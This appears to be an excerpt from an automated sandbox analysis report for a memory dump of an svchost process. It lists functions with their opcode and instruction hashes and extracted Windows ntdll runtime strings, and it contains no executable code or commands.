                                • Opcode Fuzzy Hash: dd7dbc1b65812bfdc3c8b3aa6d865845b690acf6205fec668580c866f5f05dec
                                • Instruction Fuzzy Hash: 749002A121150442D105B2584444786004687E1705F96C012A215C598CC6298E615125
                                Function 03C72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c5abd74326b62b422f26fe47593f6712fe0fd22ef08f1d0153e6dbd459f667b2
                                • Instruction ID: af5a27673156e8e58387cd342d22957042625c1a32243017c68b61198122fecb
                                • Opcode Fuzzy Hash: c5abd74326b62b422f26fe47593f6712fe0fd22ef08f1d0153e6dbd459f667b2
                                • Instruction Fuzzy Hash: 749002A134150842D101B2584454B860006C7E1705F96C015E106C598D8719CE526126
                                Function 03C72EE0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 526a57017b305494ce3da651556ccb93360e17fb026eca8b7392d55cf0b5916e
                                • Instruction ID: f4b9876c674b2e959a84995f3a2ae1a5114c1bc452cf8bc1f6534c69a1b9fd6d
                                • Opcode Fuzzy Hash: 526a57017b305494ce3da651556ccb93360e17fb026eca8b7392d55cf0b5916e
                                • Instruction Fuzzy Hash: A29002A120190803D141B6584844687000687D0706F96C011A206C599E8B298E516135
                                Function 03C72E80 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a598e5c05893417ac1694d23fd02842b938f5905a806c7946015c0961807497
                                • Instruction ID: be6bcaf4fdf9f6dfb5a73d00c66b5be37e06a639bb86c4b068c61c6544370d8e
                                • Opcode Fuzzy Hash: 0a598e5c05893417ac1694d23fd02842b938f5905a806c7946015c0961807497
                                • Instruction Fuzzy Hash: 8B90026160150902D102B2584444696000B87D0745FD6C022A102C599ECB258B92A131
                                Function 03C72EA0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 41a8f9461d4ee9289c33852617af2290e19b995a45a779a30c440bfb0ecfbf48
                                • Instruction ID: cd5d0dbdfc45c1236238367d0db5fa4f7885911f113865dcab8e29487817cca4
                                • Opcode Fuzzy Hash: 41a8f9461d4ee9289c33852617af2290e19b995a45a779a30c440bfb0ecfbf48
                                • Instruction Fuzzy Hash: 619002B120150802D141B25844447C6000687D0705F96C011A506C598E87598FD56665
                                Function 03C72E30 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0baaf74fcfee02f88e31d7af043b879ea998c830b414bc6fdc116123616509db
                                • Instruction ID: 07b89371a4f1f9fa36871b912d0783f1f71d67bc95cf137b20e3a167a4c999c8
                                • Opcode Fuzzy Hash: 0baaf74fcfee02f88e31d7af043b879ea998c830b414bc6fdc116123616509db
                                • Instruction Fuzzy Hash: 6590026130150802D103B2584454686000AC7D1749FD6C012E142C599D87258B53A132
                                Function 03C72DD0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b97de109d9ce11f4ca00854bc12cfdcce01ad0cbce555c2f91f9c8a59c9b2676
                                • Instruction ID: b95aec3ceca8c4a18cdb42d24f9c8678a2cccd89f0fdad7f0dd1d748c2d26af6
                                • Opcode Fuzzy Hash: b97de109d9ce11f4ca00854bc12cfdcce01ad0cbce555c2f91f9c8a59c9b2676
                                • Instruction Fuzzy Hash: 1D900261242545525546F2584444587400797E07457D6C012A141C994C86269A56D621
                                Function 03C72DB0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 81ae7fb7eec0737ec12ef987033e79c4b7efd00d95891b76133ac50854d34c52
                                • Instruction ID: 7959c87dcfcc67f523e0f252bad21bf2d9a84ff1698d7760c0d2f5c30b70b53c
                                • Opcode Fuzzy Hash: 81ae7fb7eec0737ec12ef987033e79c4b7efd00d95891b76133ac50854d34c52
                                • Instruction Fuzzy Hash: FE90027124150802D142B2584444686000A97D0745FD6C012A042C598E87558B56AA61
                                Function 03C73D70 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a46ec2a0147464cad4034c9c4d070c433b7f3c139742ee6d0835f494873aba4b
                                • Instruction ID: a4e54c3d3dfa140b725c4146d9cd068026ddfd04dcfd731e025f5f08c97a23e4
                                • Opcode Fuzzy Hash: a46ec2a0147464cad4034c9c4d070c433b7f3c139742ee6d0835f494873aba4b
                                • Instruction Fuzzy Hash: 0690027520150802D511B25858446C6004787D0705F96D411A042C59CD87548AA1A121
                                Function 03C72D00 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b41d002c29a04433801278505445232b55868de5e147a4098f5c61211f679b71
                                • Instruction ID: 62885221928e3cd2a7ab5da937fe13bc1477780380276833fd8c7422276209ae
                                • Opcode Fuzzy Hash: b41d002c29a04433801278505445232b55868de5e147a4098f5c61211f679b71
                                • Instruction Fuzzy Hash: A990026120554842D101B6585448A86000687D0709F96D011A106C5D9DC7358A51A131
                                Function 03C72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25339b556130a5f8428e76d34de69378d07463e8d35582d339d360ecb0dc9a3e
                                • Instruction ID: 5460a0524fe1d3517a85ca47f531e7c769fc0a721a2bf25b8d0d28aa80b5cc6c
                                • Opcode Fuzzy Hash: 25339b556130a5f8428e76d34de69378d07463e8d35582d339d360ecb0dc9a3e
                                • Instruction Fuzzy Hash: 3E90026921350402D181B258544868A000687D1706FD6D415A001D59CCCA158A695321
                                Function 03C73D10 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f3ceff87f225040f8ba1ace2eb4a329d84bb13f193e5d06741fdcd4274b7285
                                • Instruction ID: 4372523af7e2bdb675277d268a59b9ca5d73cf12e24d31191b69dbacc6e6fe92
                                • Opcode Fuzzy Hash: 4f3ceff87f225040f8ba1ace2eb4a329d84bb13f193e5d06741fdcd4274b7285
                                • Instruction Fuzzy Hash: AF900271202505429541B3585844ACE410687E1706BD6D415A001D598CCA148A615221
                                Function 03C72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2ec5e3fef85bc7883f36a9a81cfc14227ade316a7002492c8551c14abb453eba
                                • Instruction ID: 0d481d4aae41c2ebb2b2afc0bc20a2567cdc09918271c04b78fd940bbf8aa644
                                • Opcode Fuzzy Hash: 2ec5e3fef85bc7883f36a9a81cfc14227ade316a7002492c8551c14abb453eba
                                • Instruction Fuzzy Hash: 5990026130150403D141B25854586864006D7E1705F96D011E041C598CDA158A565222
                                Function 03C72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 639d774944fb959c82529cc5b8109e983852a47e9b5d0778f770922c07bb37d4
                                • Instruction ID: cd9ba0f04ae1f3449004b61af729cef47b508c8a8682916607adc07cd4643fa1
                                • Opcode Fuzzy Hash: 639d774944fb959c82529cc5b8109e983852a47e9b5d0778f770922c07bb37d4
                                • Instruction Fuzzy Hash: 8190026160550802D141B2585458786001687D0705F96D011A002C598DC7598B5566A1
                                Function 03C72CF0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 322bd08880515d1256ad3188221d8dcd285131f1ee51025be506d6dfcc097f55
                                • Instruction ID: 9d4892514085e924343abae3fedf7e74a1a02e932b6321594537480a6ec83b31
                                • Opcode Fuzzy Hash: 322bd08880515d1256ad3188221d8dcd285131f1ee51025be506d6dfcc097f55
                                • Instruction Fuzzy Hash: EA90027120150803D101B2585548787000687D0705F96D411A042C59CDD7568A516121
                                Function 03C72CA0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c374ec641fe403108ad000a50be259319a1438c7b2cafa5904bee78014e7d457
                                • Instruction ID: 1c3bcd2550a7eb90aaf10bf9a51a0c36edeeba2c6e0787d547c5b6f210126d10
                                • Opcode Fuzzy Hash: c374ec641fe403108ad000a50be259319a1438c7b2cafa5904bee78014e7d457
                                • Instruction Fuzzy Hash: C790027120150802D101B69854486C6000687E0705F96D011A502C599EC7658A916131
                                Function 03C72C60 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2740e0b13f9f5e04f4fe40e20fc2978b1eeb5632a9198ed2366e80f74479692a
                                • Instruction ID: acc37ffa046e2ec2370b46289f10d2877c31a4f321e0a16c5d262f1a977cdc65
                                • Opcode Fuzzy Hash: 2740e0b13f9f5e04f4fe40e20fc2978b1eeb5632a9198ed2366e80f74479692a
                                • Instruction Fuzzy Hash: 7F90027120150C42D101B2584444BC6000687E0705F96C016A012C698D8715CA517521
                                Function 03C72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction ID: 0d3627805aff96901c21ac4bd397b112becf48653099e955831717f6116fc35e
                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction Fuzzy Hash:
                                Function 03C72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 68f4612d5e19820e097fea57aa846fb415acdf13e87fb68241b6f7b7fc2dd38e
                                • Instruction ID: efe65e552ba8c6ba2f1a327fbf350d34c612125bbbb71844f3318db3e6f654ce
                                • Opcode Fuzzy Hash: 68f4612d5e19820e097fea57aa846fb415acdf13e87fb68241b6f7b7fc2dd38e
                                • Instruction Fuzzy Hash: 3951EBB6A04556BFCB10DF9DC99097EF7B8BB08204B188569E8A5DB641D334DF44CBE0
                                Function 03C67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                Download Yara Rule
                                Strings
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03CA46FC
                                • Execute=1, xrefs: 03CA4713
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03CA4742
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03CA4787
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03CA4725
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03CA4655
                                • ExecuteOptions, xrefs: 03CA46A0
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: 1c6f53650ccb40283799fe10f8040436b39d97cfbb627499b81fb7a745151332
                                • Instruction ID: 06b9f57d481f30b6d1324014d8eb9986d75efd06abc0d947a6222a4263b94bae
                                • Opcode Fuzzy Hash: 1c6f53650ccb40283799fe10f8040436b39d97cfbb627499b81fb7a745151332
                                • Instruction Fuzzy Hash: E8511735A003196ADB25EBA9DCC5FAE73B8AF04308F0804A9D505EF281E770EA419B50
                                Function 03C7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction ID: 34d7a80f866803ea96099025eacc2307bae200f9dd0d7ef8311687fdf6967e29
                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction Fuzzy Hash: 7D81AF74E452499EDF28CE69C8917FEBBB5AF45350F1C425AEC61EB390C7349E408B60
                                Function 03C5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03CA02E7
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03CA02BD
                                • RTL: Re-Waiting, xrefs: 03CA031E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                • Opcode ID: 80f615509c55bee5a8fbc5557b6c354e971492a0ddee51d2ba228251dccf47b1
                                • Instruction ID: b48dd6e33cae6828f470beb5e4377074818ba2f757c513872737d7287a0a4653
                                • Opcode Fuzzy Hash: 80f615509c55bee5a8fbc5557b6c354e971492a0ddee51d2ba228251dccf47b1
                                • Instruction Fuzzy Hash: 5BE1B031604B42DFD728CF28C884B6AB7E0BB85358F180A5DF9A5CB2D1D775E984CB46
                                Function 03C6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Resource at %p, xrefs: 03CA7B8E
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03CA7B7F
                                • RTL: Re-Waiting, xrefs: 03CA7BAC
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                • Opcode ID: 91ee4a63170b419d9167b136cf6e3bc633a358f36bed3f03636805aa3cb5f59d
                                • Instruction ID: ec8330e975c7650e24055be146c3fcb55e893f51878979c81df99d1cc1424b3e
                                • Opcode Fuzzy Hash: 91ee4a63170b419d9167b136cf6e3bc633a358f36bed3f03636805aa3cb5f59d
                                • Instruction Fuzzy Hash: 2341E5397047029FC724DE6ADC80B6AB7E9FF84710F140A2DE956DF690DB30E9058B92
                                Function 03C6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03CA728C
                                Strings
                                • RTL: Resource at %p, xrefs: 03CA72A3
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03CA7294
                                • RTL: Re-Waiting, xrefs: 03CA72C1
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                • Opcode ID: 841dd5f8802488c8e6727995ca81adc7fb992f5a7badcdbd3b8e057a8c326018
                                • Instruction ID: d9f05128909cebfc15da59a1f08ae3aaf03a5f25a2ffc3fd96c899188efcd288
                                • Opcode Fuzzy Hash: 841dd5f8802488c8e6727995ca81adc7fb992f5a7badcdbd3b8e057a8c326018
                                • Instruction Fuzzy Hash: 3641EE35600B06ABC720DE6ACC81B6AB7A5FB84718F144629F895EB240DB21F9529BD1
                                Function 03C77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-
                                • API String ID: 1302938615-2137968064
                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction ID: 496ba0ddffc164ef3be77e7d9607d1638b2546ec5716a4f03d6fcad8134fbe6e
                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction Fuzzy Hash: D491A170E0021E9FDF24DE69CD85ABEB7A5EF44360F18851AEC65EB2C0D7309A418B60
                                Function 03C39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: b8b59842621210d6a43b77628b99d3814a5ea1cd71b293743381447bf040af07
                                • Instruction ID: 6f1e881fbeb022f4a0fa1fbfcd48d6c0d75139eebf8b1b87225491d8be405923
                                • Opcode Fuzzy Hash: b8b59842621210d6a43b77628b99d3814a5ea1cd71b293743381447bf040af07
                                • Instruction Fuzzy Hash: 51812B76D002699BDB31DF54CC48BEEB7B8AB08710F0545DAA919FB280D7709E84DFA0